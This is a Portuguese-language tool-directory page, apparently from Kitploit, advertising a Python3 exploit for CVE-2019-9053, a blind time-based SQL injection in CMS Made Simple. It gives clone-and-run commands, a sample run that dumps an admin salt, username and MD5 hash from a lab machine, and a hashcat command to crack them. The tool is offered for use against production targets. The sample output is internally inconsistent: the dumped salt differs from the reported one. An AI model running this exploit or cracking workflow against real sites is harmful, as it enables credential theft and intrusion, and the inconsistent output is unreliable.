Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cmsms-sqli — Exploit Python3 para CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Sem dependências, SQLi cega baseada em tempo → extração de credenciais de admin. Writeup HTB dominado. | Kitploit
Ferramentas/GitHubGitHub/tim-karov/cmsms-sqli
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de Penetração
GitHubtim-karov/cmsms-sqli

cmsms-sqli

Exploit Python3 para CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Sem dependências, SQLi cega baseada em tempo → extração de credenciais de admin. Writeup HTB dominado.

Ver Repositório
16há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CMS Made Simple <= 2.2.9 Injeção SQL (CVE-2019-9053) - Exploit Python3

Port puro em Python3 do Exploit-DB original #46635 por Daniele Scanu. SQLi cega baseada em tempo para extrair credenciais de administrador de instalações vulneráveis do CMS Made Simple.

🎯 Recursos:

✅ Sem dependências externas (apenas requests)

✅ Nativo Python 3.6+ (f-strings, operador walrus)

✅ Saída colorida bonita (ANSI)

✅ Estável e rápido (~3-5 min de extração em conexões médias)

✅ Tratamento de timeout/erro para alvos em produção

✅ Saída pronta para hashcat (formato salt + MD5)

🚀 Uso:

# Clone & execute
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
# Exemplo de saída (Writeup HTB):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt

🔧 Personalização:

TIME = 3      # Tempo de pausa (mais lento = mais estável)
timeout = 20  # Timeout da requisição
chars = '...' # Conjunto de caracteres personalizado

📝 Créditos:

Autor original: Daniele Scanu

Exploit-DB: #46635

Port Python3 e melhorias: Tim Karov

📄 Licença:

Licença MIT - Veja LICENSE


⭐ Dê uma estrela se útil! Usado em laboratórios HTB/TryHackMe e testes de penetração reais.

Baixar ferramenta